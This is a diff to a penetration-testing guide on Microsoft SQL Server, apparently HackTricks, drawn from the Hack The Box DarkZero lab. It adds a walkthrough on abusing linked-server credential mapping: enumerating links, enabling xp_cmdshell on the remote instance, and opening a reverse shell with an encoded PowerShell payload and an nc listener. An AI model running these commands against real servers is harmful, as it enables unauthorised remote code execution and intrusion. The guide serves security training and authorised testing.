HTB DarkZero

src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md

@@ -414,6 +414,53 @@ KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
 ../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md
 {{#endref}}
 
+#### Linked-server credential mapping -> remote `sysadmin` -> OS RCE
+
+Linked servers can be configured with a **non-self login mapping** (`Local Login` -> `Remote Login`). In that case, a low-privileged login on the first SQL Server can execute queries on the second one **as the mapped remote principal**. This works the same way even when the linked instance lives in **another domain or forest**.
+
+First enumerate the links and their mappings:
+
+```sql
+EXEC sp_linkedservers;
+EXEC sp_helplinkedsrvlogin '<LINK_NAME>';
+```
+
+Then verify which account you become on the remote side and whether it is `sysadmin`:
+
+```sql
+EXEC ('SELECT SYSTEM_USER') AT [<LINK_NAME>];
+EXEC ('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [<LINK_NAME>];
+```
+
+If the mapped remote login is `sysadmin`, the linked server becomes a **remote code execution primitive** because you can reconfigure the far-end instance and run OS commands as the **SQL Server service account**:
+
+```sql
+EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [<LINK_NAME>];
+EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [<LINK_NAME>];
+EXEC ('EXEC xp_cmdshell ''whoami''') AT [<LINK_NAME>];
+```
+
+Using `impacket-mssqlclient`, the same workflow is usually faster:
+
+```bash
+mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<SQLHOST>
+# Inside the SQL shell:
+enum_links
+use_link [<LINK_NAME>]
+enable_xp_cmdshell
+xp_cmdshell whoami
+```
+
+To upgrade single-command execution into an interactive shell, launch a reverse shell through `xp_cmdshell`:
+
+```bash
+xp_cmdshell powershell -e <BASE64_BLOB>
+rlwrap -cAr nc -lnvp 443
+```
+
+> [!TIP]
+> If `xp_cmdshell` is disabled, the initial error often confirms that `sp_configure` / `RECONFIGURE` is the intended enablement path. Also look for exported policy files such as `Policy_Backup.inf` (`secedit /export` output), because they can expose local rights assignments (`SeImpersonatePrivilege`, `SeDebugPrivilege`, Kerberos skew, SMB signing, NTLM hardening) that help choose the next privilege-escalation step once you land on the SQL host.
+
 ### **Write Files**
 
 To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file:
@@ -731,7 +778,9 @@ You probably will be able to **escalate to Administrator** following one of thes
 ## References
 
 - [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/)
+- [HTB: DarkZero - linked-server credential mapping to cross-forest RCE](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html)
 - [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html)
+- [Microsoft Learn - sp_helplinkedsrvlogin (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-helplinkedsrvlogin-transact-sql)
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
@@ -802,4 +851,3 @@ Entry_3:
 ```
 
 {{#include ../../banners/hacktricks-training.md}}
-